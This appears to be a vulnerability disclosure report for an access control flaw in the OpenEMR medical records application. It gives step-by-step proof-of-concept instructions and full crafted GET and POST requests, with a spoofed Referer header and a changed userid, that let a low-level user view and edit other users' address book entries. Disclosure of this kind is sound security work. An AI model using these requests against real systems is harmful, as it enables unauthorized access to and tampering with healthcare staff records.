Description

An Access Control Vulnerability allows a low level user in the web application to view and edit information for all other users in the Admin Address Book.

Proof of Concept

Step 1. Login to the openemr web application as a low level user (Ex: Receptionist in openemr demo)

Step 2. Travel to a page that will cause your browser to send a new request. For example, select Patient->New/Search. Capture this request using a tool such as BurpSuite.

Step 3. Now you need to modify the Path and Referer header of your captured request.
Change the path of your request to: GET /openemr/interface/usergroup/addrbook_edit.php?userid=6 Theid parameter will indicate which user’s info you will view and be able to edit

Also change the Referer Header of the request to look like you were coming from : /a/openemr/interface/usergroup/
If testing this in the demo web app, your referer header will look like: Referer: https://demo.openemr.io/a/openemr/interface/usergroup/

The final request should look like this:

GET /openemr/interface/usergroup/addrbook_edit.php?userid=6 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://demo.openemr.io/a/openemr/interface/usergroup/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Step 4. Send this modified request and the response will display the user’s existing address book info and will allow you to edit it. Make a change to this information to test your ability to edit it. Click the save button and capture the request using Burp.

Step 5. The path and referer header to the captured request will be incorrect. Modify them the same way you did in step 3 (This will be a POST request unlike in step 3). This request should look like this:

POST /openemr/interface/usergroup/addrbook_edit.php?userid=6 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...Redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 648
Origin: https://demo.openemr.io
Dnt: 1
Referer: https://demo.openemr.io/a/openemr/interface/usergroup/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

csrf_token_form=7478f62092304859880f40f03b458372ff3364c1&form_title=&form_lname=Lee&form_fname=Donna&form_mname=&form_suffix=&form_specialty=&form_organization=&form_director_title=&form_director_lname=Lee&form_director_fname=Donna&form_director_mname=&form_director_suffix=&form_valedictory=&form_phone=&form_phonecell=&form_phonew1=&form_phonew2=&form_fax=&form_assistant=&form_email=&form_email_direct=&form_url=&form_street=123+Sunshine+Ave&form_streetb=&form_city=&form_state=&form_zip=&form_street2=&form_streetb2=&form_city2=&form_state2=&form_zip2=&form_upin=&form_npi=&form_federaltaxid=&form_taxonomy=207Q00000X&form_notes=&form_save=Save

Step 6. Now login to an administrator account and view the address book. The test change you made with the low level account will have taken effect.